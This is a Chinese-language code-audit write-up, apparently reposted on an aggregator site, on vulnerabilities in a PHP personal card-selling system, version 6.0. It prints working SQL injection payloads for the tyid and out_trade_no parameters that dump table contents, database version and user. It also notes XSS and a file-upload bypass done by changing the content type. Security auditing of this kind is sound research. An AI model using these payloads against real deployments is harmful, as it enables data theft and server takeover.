代码审计(某个人发卡系统V6.0(php))

编程入门 行业动态 更新时间:2024-10-28 12:21:22

代码审计(某个人<a href=https://www.elefans.com/category/jswz/34/1757283.html style=发卡系统V6.0(php))"/>

代码审计(某个人发卡系统V6.0(php))

一、前台漏洞

1、前台文件包含漏洞(如果开启了gbc,可远程包含)

注入点1:

tyid没任何过滤,存在注入

payload:.php?act=selgo

POST传参:

tyid=1/**/union/**/select/**/*/**/from/**/if_km/**/limit/**/0,1#

注入点2:

也是没加任何过滤

POST传参

payload:

out_trade_no=1',1,33,'','2023-11-09 21:23:52','',2),((select version()),(select database()),(select user()),'','2023-11-09 21:23:52','',2)#&number=2&gid=1&money=33

注入点3:

xss

二、后台漏洞

1、任意文件上传

只判断了文件的类型是否属于数组中的类型,并未对文件后缀进行判断,即造成任意文件上传

需要抓包改一下文件类型

更多推荐

代码审计(某个人发卡系统V6.0(php))

本文发布于:2023-11-15 16:13:19,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1602556.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:发卡   某个人   代码   系统   php

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!